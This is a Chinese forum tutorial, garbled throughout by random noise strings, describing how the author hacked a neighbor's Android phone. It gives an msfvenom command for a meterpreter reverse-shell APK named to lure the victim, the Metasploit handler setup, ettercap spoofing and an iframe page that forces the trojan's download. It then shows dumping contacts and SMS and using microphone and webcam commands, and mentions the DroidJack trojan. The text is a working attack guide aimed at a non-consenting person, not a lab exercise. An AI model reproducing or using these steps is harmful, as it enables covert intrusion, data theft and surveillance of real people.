|
) @0 W" H5 i6 d+ B: J$ a+ F; E9 _
五、msf+ettercap入侵邻居安卓手机 ( M( b; Z1 y% u; w! o+ l
( j$ ]6 x& _% G6 L4 x! I
3 y: B0 w+ B, z; @( l, z 首先启动msf
6 n! p% M- `0 P9 M- J( W
2 L, [7 W3 k( a9 e h) Y
: H9 h9 W# A! p( n 先用kali生成一个安卓木马,如下命令:
3 n( ~" P! x4 I
' w8 p4 X, c) w Y
6 c, d5 r+ R* H6 S Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
- H8 I3 X+ b6 Z6 n3 m
; a& n; E7 t7 Z' _+ h( @9 y# A y5 ~. E$ s+ z
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 1 P2 j- a( T9 U1 ?8 |" p7 x, V# q
! {! @/ c% A! l5 s* L! u- O5 g6 \+ a8 c U, h
然后进入msf
- N5 t: w5 H( I6 l# W2 B( T4 Q - Z) G9 o. }8 @3 @, Q9 s: L' ~3 ~
7 g9 X+ R# Z4 }, U
use exploit/multi/handler ) ]9 d; C- H: D% e O+ _# N4 H" _
/ _' |+ x7 z& f& i! C. |1 x) _( Y
" J/ J0 h4 l% |5 {& ^- m9 I/ f0 v set payload android/meterpreter/reverse_tcp + D: X8 f1 g5 _7 o8 W5 {% f
- G! \3 `4 S( ~# u! M, ~ x9 m) t k7 A% R, e6 N
set LHOST 192.168.0.109 //ip为kaili的ip
$ x, u5 R( k! r# x: ~- ^4 Y 5 Y) H9 y1 D+ W6 b) m
0 G0 I$ Y- @8 R2 n8 g* @1 D set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 ~( K+ n: U2 S
, h/ p: b1 D/ W# a5 m) _$ T, Q0 Y& G* v3 @5 f3 K
Exploit
T+ B5 F7 Q8 P! g7 X; C3 x
6 S7 v0 j# P- L \6 d1 b2 r* _. p( D" Q- t1 R! ~4 T
" Y; D( P5 j4 x$ l: z " o/ ?8 O$ T O$ c/ M
6 e1 F4 S+ O; g9 R* n+ Y. x 下面我们开启ettercap -G
; n- W- v% U' @; I: u; c' ]
* w) b$ J8 P7 G* N( o
4 ], `' p9 U! H. F5 z 我物理IP为 : H3 m" N% Z% j1 Q$ x
2 ?5 ~6 N/ _# K2 r/ @8 Q
# L2 N% @+ [: s z# ?( g $ Q( T }1 `$ Q$ t
8 w' e! i& \0 V" p' | n9 F4 c
% m$ |1 F6 |1 p/ b" `1 V+ } 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ! w% y, f; q6 ~7 I7 Q& D
; i0 a5 D: A/ {: i4 j9 `" M0 Q7 Y0 F' g- v0 y" h5 j3 w
下面我们来设置一下 I5 N; l2 P8 T- ?" g
8 V- V/ a. h/ K: A
; m" U e `5 \6 t9 e
0 R: E9 \2 ~2 y" o% m( |) s
/ m; ]1 t. A# u. K; r; `+ d3 }9 O7 y: o; [
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
$ n+ V! y$ n j# D2 Y ) H* |, O2 }/ P$ B: T4 D6 e. j
# T b) P5 Q, O- k
0 P5 D" @1 A H% n0 u+ U
& b" U# b9 S2 X) ?3 f9 o
. l Y9 x* F( y
% o: L3 A" y- Z' K# h / w* L1 v5 I0 J+ ]0 }5 j3 \5 h r
6 {0 @" F/ \& y' P& n4 @! l& }" j
* ^6 }3 \& k* R # a! a" X9 a. r) S G
2 e# q( ~3 `$ c# H + H; G( k) v! e" s/ K$ O: b
0 A& P W; d2 U+ B# M$ v- O* F9 m/ {4 n8 F! R9 h+ m
8 x+ e+ g v5 f* ^; E V
3 x% R+ s ~! ^3 K2 O$ L
& T5 ?1 ^% |4 _0 J' ]- u) b V
) E% v& r* B' X3 m' } 7 g# |* w; S6 @+ j1 @9 b- \+ g8 g
, z/ ^" q& c: _4 u, s+ J
# z- |7 p: c# |# N5 G2 z( H9 L ) u8 [' i$ G- ^" _
7 P4 J. o3 D6 p4 D# O5 s7 z' y
1 Y; u; R3 C8 z9 b! B
" J- E! P/ w1 `* i Z1 \( Q, o/ q: r/ k9 ?
" n6 n0 w4 V! C! T M
; D# ]- ?$ W! e3 l, a+ o& z
* f. Y, _1 Q/ o" O # x* e3 X s; H# x
5 z$ e9 f9 p* N( S2 M6 b% ?
8 j6 I: a* _( @5 I. ~+ [6 P
+ [& @+ v; |2 r2 x+ C( W
% r1 k' K* K. ~: E0 W; k
( |7 B7 l. M4 v4 A
2 G, Y' r1 q w/ o" F% l" B
* L- M) b, A$ f: _7 u/ ]! D r" J* q6 ?7 l
7 n, T+ o) J1 E9 a! J
0 n2 R' M, p6 k7 V; E8 d; U
5 p `. J% k! s J4 q) M) l 下面我们开始攻击 2 J @' k2 a Y( J1 ^
8 J+ f+ N; o7 H/ N: c
" X/ N1 |' B' P7 B* |+ O# Z
5 C" k$ g# h$ A( m$ _9 | ) h( K5 s# B5 A* }2 I- v0 N
- m5 L& K9 F# _; R! F, x2 O; r: z : x: D; T1 k4 T7 \6 o
+ H3 y. f ]# d5 e
. J4 X. ~5 r# P7 m9 H
; b1 b; ?2 b9 a- \8 \ * f- p/ M! a; ` u" ^. z2 h+ j- F
2 a4 c2 i e) c, `$ z, T; Y
: t8 A5 {, P# B% N; D
; e3 q/ `9 ?" Z- b# K+ Y2 s% W3 U. C* ~4 E/ k0 y
5 C( F4 ? _6 w, }# P- {# ?) w
" r% y. S2 m& d7 v
. P1 b7 ?# H! B4 T/ R 大概过了5分钟多,发现反弹成功了
; M- ?- O% p$ x! B R0 w |8 l+ U/ V0 b9 V$ h* ]& c
' N3 D7 {4 X f1 _# j
' j+ K" k% A8 E6 W% h, X" m7 @+ v
9 u3 k' G1 B0 p: N% Y& @( r/ n* g+ Y/ ]% o, K W
% x! q, N9 U+ C & J" N* J9 U( d/ i5 x3 n+ y9 S
, w4 n9 t8 R2 e% @- g
0 y# a: ^7 S @/ @# l3 n D: d
: F% i( O5 u( Q, I
5 H( y* _& `+ U. J
7 ~, a, D6 L3 F6 W* I' G) ^
' ^" o3 T. C" E" h& {: X9 Q
# n' {$ L& C3 S+ ?2 H, p: k * ]# C: ~2 @: S* L7 k5 |) x
+ _% `: p( j# T+ u
% l( F1 }; \1 U0 P l& A( b! o: X& Z1 d; j9 x
) c5 }3 m9 G$ X% d
7 B" P& o% e; g, A, l- M, D% p
! Y3 x% B7 E. m ( l% X2 r1 p4 o }. d
& d0 m/ M- q1 s b/ s
执行命令
9 d/ g2 F' w7 o" ^( i0 y , \+ d1 p3 z1 j4 `6 T+ E
7 v1 S2 S! T0 p4 [3 O
6 c, d+ b, ~+ Y' d- p- S
" X. @: B. S- ~* d/ A5 Y
1 E+ T7 v" G6 j0 i
dump_contacts --》这个是导出电话 7 E: t+ u# S9 v2 ^7 @# G
% Y. G m, m6 _9 w0 V
: u, F6 A8 ^& b, ^; ?' |$ J* K- U/ e
dump_sms --》这个是导出信息 ) r O- n3 ~" _- w8 ^) ^$ b
% W4 w+ \) p7 ^) ?4 s
, k" J5 `1 c) J) I4 L# x) S
record_mic Record audio from the default microphone for X seconds % I0 K: a- r# ?9 H8 X2 N- K
/ l7 J% X' y: b: v1 c
6 q$ U O6 \+ a# E0 i& Z9 {- o$ Y webcam_chat Start a video chat 2 p q2 ] Y9 W
0 D1 n+ f `4 i: C
4 @# L, R O7 I+ _" H7 q) @( J( v" @ webcam_list List webcams
/ |: K( m3 K1 C
0 n. p; w3 g# Y2 h( ^0 g" }4 N6 w3 }* F2 g
webcam_snap Take a snapshot from the specified webcam
+ q+ R. e9 t+ G- ^4 o0 ?; J ( } K: f0 h! u5 W g3 b+ C4 \* j
" C" h f2 \4 [& S; K- |; { webcam_stream   lay a video stream from the specified webcam
9 {" [# o0 a0 ]+ v3 k- R' m. { 8 _# d$ q' `( J* L" v
. i0 ]: v' Q H9 R% l5 D
& d4 g6 r+ ^; h4 G) `7 s 4 a/ U7 P3 @* D% c8 l
. M+ l) z& O1 h$ m/ s 6 q9 {, Z* r2 F/ Y9 {" G7 H$ V
$ w: Z1 E D( j8 i! p6 C
/ _6 F& G9 o0 j4 x* M 我们打开看一下电话薄,
$ U0 g2 R3 k3 s $ t; F: M3 p, Z
# s+ j# U# P" Z( @ 4 K! s P, @+ K; W( k
7 h+ t( ^7 W8 v
/ _; W6 [8 I+ G
3 |0 Z) h& T2 `0 f8 _. L ) p1 \2 ~ D7 t7 v
# u+ `$ j7 [$ Y
' }+ j4 ]3 u+ F- X- A! `8 g
( X5 x8 D. {4 p
# Z: _0 c, |% U: p1 \ 2 [% \& Z7 J. W3 c U" d7 \
I Y2 u2 j1 L0 I
9 f0 x; V# o& s e& J8 L+ J+ T5 {2 p! s! x+ f$ C
/ C# o% D' g; P+ q- C, H
" C. H' e; p" Y
- O( ^# s+ A" N/ Y- } $ @3 ]+ t1 i1 Z/ ^* R0 `
, Z. G1 n# M' Z/ C* j3 `- R 我们同时欺骗成DroidJack木马,使用方法如图: K- |/ M F' |7 j; ~% f9 l
+ O" F. R! D0 h, h! _4 h9 w8 {+ U! S: [0 v6 J) s8 G4 ] {
/ Y4 \ G$ z5 l2 b5 r4 |+ | 8 a! F! Q: H3 _2 q N
6 V b9 k- a6 Z8 z, l
' N# i2 j2 D2 f # |8 @' x4 S7 F0 Y. ~5 u" }: b7 C1 A# @
% \: P! H' `# h$ V4 u7 e% P! D/ ]
' ?0 }" `& N. ^0 d 6 e, ?3 K- y8 \
6 o0 V+ \! C g7 L9 p7 g/ G9 U 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 6 k' \4 b$ I( _7 X+ ~8 `; J+ \
1 _1 c: P4 P" i0 a6 a- | v5 V2 {9 L! e& p
0 u! h: W1 ?+ B$ J0 F# Z _ / G3 e1 B/ L- E! E; B6 U
1 w u U& y4 ?0 ?
; S2 g7 z' o* N" m, o! q. i. _ * X4 p$ f0 h, @& P% C3 e; H
- H. V. y0 b; U" o2 c- m- J @
& t9 T: G4 e/ f5 A( C6 T
5 L/ |2 F! _. j# V5 T0 p" T6 i/ Q& Y- E1 l( z# [! j) m8 B

1 `' Q; c5 g. U4 Q7 C k R7 n4 O 4 q. M- y$ V, c' L2 y8 f" R
6 M+ f$ b' f( p, Y5 h9 q
: y& q% V' H# m8 k' D! `( ?' ]
|